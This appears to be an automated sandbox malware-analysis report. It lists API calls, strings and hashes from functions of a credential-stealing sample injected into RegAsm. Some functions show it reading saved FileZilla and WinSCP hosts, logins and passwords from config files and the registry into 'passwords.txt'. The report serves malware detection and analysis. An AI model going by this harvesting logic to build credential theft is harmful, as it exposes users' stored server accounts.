Function 0040C050 Relevance: 93.4, APIs: 62, Instructions: 429memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040BF10: lstrlen.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BF5F
Part of subcall function 0040BF10: strchr.MSVCRT ref: 0040BF75

GetProcessHeap.KERNEL32(00000008,0040C8C0,?,75AA5460,00000000,?,?,?,?,?,?,?,?,004215B1,000000FF), ref: 0040C0B1
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?,?), ref: 0040C0B8
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?), ref: 0040C0CD
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?,?), ref: 0040C0D4
strcpy_s.MSVCRT ref: 0040C0F1
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040C102
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004215B1), ref: 0040C109
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C133
HeapFree.KERNEL32(00000000), ref: 0040C13A
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C146
HeapAlloc.KERNEL32(00000000), ref: 0040C14D
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C162
HeapFree.KERNEL32(00000000), ref: 0040C169
strcpy_s.MSVCRT ref: 0040C18C
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C19A
HeapFree.KERNEL32(00000000), ref: 0040C1A1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C1C0
HeapFree.KERNEL32(00000000), ref: 0040C1C7
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C1D3
HeapAlloc.KERNEL32(00000000), ref: 0040C1DA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C1EF
HeapFree.KERNEL32(00000000), ref: 0040C1F6
strcpy_s.MSVCRT ref: 0040C219
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C227
HeapFree.KERNEL32(00000000), ref: 0040C22E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C256
HeapFree.KERNEL32(00000000), ref: 0040C25D
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C269
HeapAlloc.KERNEL32(00000000), ref: 0040C270
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C285
HeapFree.KERNEL32(00000000), ref: 0040C28C
strcpy_s.MSVCRT ref: 0040C2AC
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C2BD
HeapFree.KERNEL32(00000000), ref: 0040C2C4
lstrlen.KERNEL32(00000000), ref: 0040C2CB
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C2DD
HeapAlloc.KERNEL32(00000000), ref: 0040C2E4
lstrlen.KERNEL32(00000000), ref: 0040C305

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

strcpy_s.MSVCRT ref: 0040C32B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C342
HeapFree.KERNEL32(00000000), ref: 0040C349
lstrlen.KERNEL32(00000000), ref: 0040C350
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C35F
HeapAlloc.KERNEL32(00000000), ref: 0040C366
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C374
HeapFree.KERNEL32(00000000), ref: 0040C37B

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

strcpy_s.MSVCRT ref: 0040C397
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C3A3
HeapFree.KERNEL32(00000000), ref: 0040C3AA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C3D7
HeapFree.KERNEL32(00000000), ref: 0040C3DE
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C3EA
HeapAlloc.KERNEL32(00000000), ref: 0040C3F1
strcpy_s.MSVCRT ref: 0040C407
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C416
HeapFree.KERNEL32(00000000), ref: 0040C41D
lstrlen.KERNEL32(00000000,00000000,?,?,?), ref: 0040C491
lstrlen.KERNEL32(00000000,00000000), ref: 0040C4A1
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C530
HeapFree.KERNEL32(00000000), ref: 0040C537

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$lstrcpymallocstrchrstrncpy
String ID:
API String ID: 3662779188-0
Opcode ID: 94de16d627383293b9dc17cc193afd69119facb2a0f6166f012a74c18b98ba21
Instruction ID: b40cbd5fc23cbd84975b33a862b5865f3c8f674952f2fc639572ad373f1cfd8d
Opcode Fuzzy Hash: 94de16d627383293b9dc17cc193afd69119facb2a0f6166f012a74c18b98ba21
Instruction Fuzzy Hash: DFE16575900216EBCB14EBE0DC99EAF7B79FF49304F50552AFA02B3281DB385905CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB59 Relevance: 66.8, APIs: 28, Strings: 10, Instructions: 295stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CB66
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB71

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CBA8
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBB3
StrStrA.SHLWAPI(00000000,<User>), ref: 0040CBF0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBFB
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CC38
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CC47
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCD3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCEB
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD03
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD1B
lstrcat.KERNEL32(?,Soft: FileZilla), ref: 0040CD33
lstrcat.KERNEL32(?,Host: ), ref: 0040CD42
lstrcat.KERNEL32(?,00000000), ref: 0040CD55
lstrcat.KERNEL32(?,00427F1C), ref: 0040CD64
lstrcat.KERNEL32(?,00000000), ref: 0040CD77
lstrcat.KERNEL32(?,00427F20), ref: 0040CD86
lstrcat.KERNEL32(?,Login: ), ref: 0040CD95
lstrcat.KERNEL32(?,00000000), ref: 0040CDA8
lstrcat.KERNEL32(?,00427F2C), ref: 0040CDB7
lstrcat.KERNEL32(?,Password: ), ref: 0040CDC6
lstrcat.KERNEL32(?,00000000), ref: 0040CDD9
lstrcat.KERNEL32(?,00427F3C), ref: 0040CDE8
lstrcat.KERNEL32(?,00427F40), ref: 0040CDF7

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

strtok_s.MSVCRT ref: 0040CE3B
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE51
memset.MSVCRT ref: 0040CEA5

Strings

Password: , xrefs: 0040CDC0
<Pass encoding="base64">, xrefs: 0040CC32
O{BN{BK{B, xrefs: 0040CE1C
Login: , xrefs: 0040CD8F
passwords.txt, xrefs: 0040CE64
Host: , xrefs: 0040CD3C
<User>, xrefs: 0040CBEA
<Host>, xrefs: 0040CB60
<Port>, xrefs: 0040CBA2
Soft: FileZilla, xrefs: 0040CD2D

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$mallocmemsetstrncpystrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $O{BN{BK{B$Password: $Soft: FileZilla$passwords.txt
API String ID: 368316605-4044742749
Opcode ID: a71d7c5eb2794acaf3baeb6c0767e04cec7d8e32e5adc8a198758464054fccae
Instruction ID: 003d06b88ee209d3646e7d5b0c8682ef30a99e174e8e8da48fb9cda7d86fbdc0
Opcode Fuzzy Hash: a71d7c5eb2794acaf3baeb6c0767e04cec7d8e32e5adc8a198758464054fccae
Instruction Fuzzy Hash: F5B1B575904219AACB04EBA1DC56BEEBB78BF19304F50046EF501B3192DF786A48CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409460 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 297stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409579
GetFileSize.KERNEL32(00000000,00000000,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409582
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409591
??_U@YAPAXI@Z.MSVCRT ref: 0040959B
ReadFile.KERNEL32(00000000,00000000,00000000,00420CA3,00000000,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF), ref: 004095AE
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095BB
HeapAlloc.KERNEL32(00000000,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095C2
StrStrA.SHLWAPI(00000000,012C3050,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095D3
StrStrA.SHLWAPI(-00000010,012C31D0,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095EE
lstrcat.KERNEL32(000000FF,012BF990), ref: 00409604
lstrcat.KERNEL32(000000FF,00000000), ref: 00409617
lstrcat.KERNEL32(000000FF,00427C54), ref: 00409626
lstrcat.KERNEL32(000000FF,00000000), ref: 00409639
lstrcat.KERNEL32(000000FF,00427C58), ref: 00409648
lstrcat.KERNEL32(000000FF,012BF9A0), ref: 00409658
lstrcat.KERNEL32(000000FF,-00000010), ref: 00409663
lstrcat.KERNEL32(000000FF,00427C5C), ref: 00409672
StrStrA.SHLWAPI(-000000FE,012C27E0,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409683
StrStrA.SHLWAPI(00000014,012C2840,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409694
lstrcat.KERNEL32(000000FF,012BF9D0), ref: 004096AA

Part of subcall function 00409330: memset.MSVCRT ref: 00409359
Part of subcall function 00409330: lstrlen.KERNEL32(004096B6,00000001,?,00001FA0,00000000,00000000,?,004096B6), ref: 00409376
Part of subcall function 00409330: CryptStringToBinaryA.CRYPT32(004096B6,00000000,?,004096B6), ref: 0040937E
Part of subcall function 00409330: memcpy.MSVCRT ref: 004093F1

lstrcat.KERNEL32(000000FF,00000000), ref: 004096BE
lstrcat.KERNEL32(000000FF,00427C60), ref: 004096CD
StrStrA.SHLWAPI(-000000FE,012C2840,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004096DE
StrStrA.SHLWAPI(00000014,012BF970,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004096EF
lstrcat.KERNEL32(000000FF,012C2FC0), ref: 00409705

Part of subcall function 00409330: lstrcat.KERNEL32(00427AA7,00427AAB), ref: 0040942D

lstrcat.KERNEL32(000000FF,00000000), ref: 00409719
lstrcat.KERNEL32(000000FF,00427C64), ref: 00409728
lstrcat.KERNEL32(000000FF,00427C68), ref: 00409737
StrStrA.SHLWAPI(-00000002,012C3050,?,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409748
lstrlen.KERNEL32(000000FF,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 0040975C
memset.MSVCRT ref: 004097B1
CloseHandle.KERNEL32(00000000), ref: 004097BA

Strings

passwords.txt, xrefs: 0040976F

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$lstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
String ID: passwords.txt
API String ID: 2388354673-347816968
Opcode ID: 5a654361f85f1658c3a5def7892f4f95e1b70a1c674a40a5ac9adb1185208a92
Instruction ID: 0c1f35d45bd3c2b6c9383514b9817522ff8a3a891fab0831307e9c008aa627d4
Opcode Fuzzy Hash: 5a654361f85f1658c3a5def7892f4f95e1b70a1c674a40a5ac9adb1185208a92
Instruction Fuzzy Hash: 78B1C375900205EBDB10EBA0DC59FEE7BB9BF1A304F540519FA02A3291DF785A48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73E Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00421610,Soft: WinSCP), ref: 0040C74C
lstrcat.KERNEL32(00421610,Host: ), ref: 0040C75B
RegGetValueA.ADVAPI32(000000FF,?,HostName,00000002,00000000,?,?), ref: 0040C77F
lstrcat.KERNEL32(00421610,?), ref: 0040C78C
RegGetValueA.ADVAPI32(000000FF,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040C7B7
lstrcat.KERNEL32(00421610,00000000), ref: 0040C7DD
lstrcat.KERNEL32(00421610,:22), ref: 0040C7F9
lstrcat.KERNEL32(00421610,00427E4C), ref: 0040C808
lstrcat.KERNEL32(00421610,Login: ), ref: 0040C817
RegGetValueA.ADVAPI32(000000FF,?,UserName,00000002,00000000,?,?), ref: 0040C83B
lstrcat.KERNEL32(00421610,?), ref: 0040C848
lstrcat.KERNEL32(00421610,00427E64), ref: 0040C857
RegGetValueA.ADVAPI32(000000FF,?,Password,00000002,00000000,?,?), ref: 0040C87B
lstrcat.KERNEL32(00421610,Password: ), ref: 0040C886
StrCmpCA.SHLWAPI(?,00427B3E), ref: 0040C898
lstrcat.KERNEL32(00421610,00000000), ref: 0040C8D3
lstrcat.KERNEL32(00421610,00427E80), ref: 0040C8ED
lstrcat.KERNEL32(00421610,00427E84), ref: 0040C8FC
RegEnumKeyExA.ADVAPI32(000000FF,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C921

Part of subcall function 00411C10: wsprintfA.USER32 ref: 00411C2B

memset.MSVCRT ref: 0040C932
memset.MSVCRT ref: 0040C940
lstrlen.KERNEL32(00421610), ref: 0040C958
memset.MSVCRT ref: 0040C9AB

Strings

HostName, xrefs: 0040C772
PortNumber, xrefs: 0040C7A3
Login: , xrefs: 0040C811
Password: , xrefs: 0040C880
passwords.txt, xrefs: 0040C96B
Soft: WinSCP, xrefs: 0040C746
UserName, xrefs: 0040C82E
Password, xrefs: 0040C86E
Host: , xrefs: 0040C755

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Value$memset$Enumlstrlenwsprintf
String ID: Host: $HostName$Login: $Password$Password: $PortNumber$Soft: WinSCP$UserName$passwords.txt
API String ID: 2902345061-4040920679
Opcode ID: 1931a26709b873a9a79a9113923cd97d7f2f2d3008c82f8dd77ed5c2946b83cf
Instruction ID: 15f759088607e9964790177d35be8adeac096382de0593ff92e4df6e6086aa5c
Opcode Fuzzy Hash: 1931a26709b873a9a79a9113923cd97d7f2f2d3008c82f8dd77ed5c2946b83cf
Instruction Fuzzy Hash: 17717FB1D0021AABCB04DBE4DC95EFFB779EB48304F50455AF615A3180D6785E488B74

Uniqueness

Uniqueness Score: -1.00%

Function 19B45660 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 452COMMON

Download Yara Rule

Strings

_node, xrefs: 19B4579E
CREATE TABLE x(%.*s INT, xrefs: 19B457CA
,%.*s, xrefs: 19B45804, 19B45835
Auxiliary rtree columns must be last, xrefs: 19B456B3, 19B458B3

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
API String ID: 0-209218429
Opcode ID: 504ff68d8701a08f2e89cac7ec56ea71ff592e68b546c6d3766254c13611619e
Instruction ID: 2d5a46b6b9621488ad6189b1f7c2e5e32dfa2e530a821c0d8fcbd1bfae83eaf4
Opcode Fuzzy Hash: 504ff68d8701a08f2e89cac7ec56ea71ff592e68b546c6d3766254c13611619e
Instruction Fuzzy Hash: BCF142755007549FC7008F34C880A5BBBE9FF44B04F584468ED8A87651EB76F81AEBA3

Uniqueness

Uniqueness Score: -1.00%

Function 19B09120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON

Download Yara Rule

Strings

_node, xrefs: 19B09202
CREATE TABLE x(_shape, xrefs: 19B09268
,%s, xrefs: 19B09297

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%s$CREATE TABLE x(_shape$_node
API String ID: 0-1242591684
Opcode ID: af49aa8dc5e53809ff713ef0bc1cc569df414691ca31f1919687467cf9a393f4
Instruction ID: ef12d598921b6e9478dddc935d631fa3d46cd2ae0300a081b3529a0448dd8feb
Opcode Fuzzy Hash: af49aa8dc5e53809ff713ef0bc1cc569df414691ca31f1919687467cf9a393f4
Instruction Fuzzy Hash: A1C103755003559BD7108F74CD94B177BFAFF40B08F0C8568E98A872A1EB36E41ACBA6

Uniqueness

Uniqueness Score: -1.00%

Function 19BBB050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON

Download Yara Rule

Strings

,%s%s%s, xrefs: 19BBB137
%c%u, xrefs: 19BBB2C3
%.18s-%s, xrefs: 19BBB192
%s(%d), xrefs: 19BBB1B3
vtab:%p, xrefs: 19BBB283
(blob), xrefs: 19BBB26C
NULL, xrefs: 19BBB267, 19BBB324, 19BBB325
%lld, xrefs: 19BBB1DA, 19BBB24C
BINARY, xrefs: 19BBB0D3
%.16g, xrefs: 19BBB217
k(%d, xrefs: 19BBB0A5
program, xrefs: 19BBB2FB

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 0-900822179
Opcode ID: 9003e03f7e68aae0d007fcf6fe7d13302544c3af62e16f9931f55dc8b1218131
Instruction ID: 198142f31d33754c391ef19bc20350ea5beb6430732a3a7868789baa036c84fb
Opcode Fuzzy Hash: 9003e03f7e68aae0d007fcf6fe7d13302544c3af62e16f9931f55dc8b1218131
Instruction Fuzzy Hash: 5191D5715083559FCB14CF54D841BBB7BE5FF45304F4C888AE9868F292D732E80A87A1

Uniqueness

Uniqueness Score: -1.00%

Function 19A7D820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON

Download Yara Rule

Strings

snippet, xrefs: 19A7D93C
fts3, xrefs: 19A7D9CA
fts3tokenize, xrefs: 19A7DA27
matchinfo, xrefs: 19A7D970, 19A7D98A
unicode61, xrefs: 19A7D90B
simple, xrefs: 19A7D8A9
fts3_tokenizer, xrefs: 19A7D921
porter, xrefs: 19A7D8EE
fts4aux, xrefs: 19A7D840
offsets, xrefs: 19A7D956
fts4, xrefs: 19A7D9F0
optimize, xrefs: 19A7D9A4

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 0-449611708
Opcode ID: e09aca2e52b6632364c322b916f60199a7f2194248675d1484ff7ab82bce312d
Instruction ID: e0507ae894a3344ca6aae44a7793b5c6238191d906a81ab9236821a44f84e8fa
Opcode Fuzzy Hash: e09aca2e52b6632364c322b916f60199a7f2194248675d1484ff7ab82bce312d
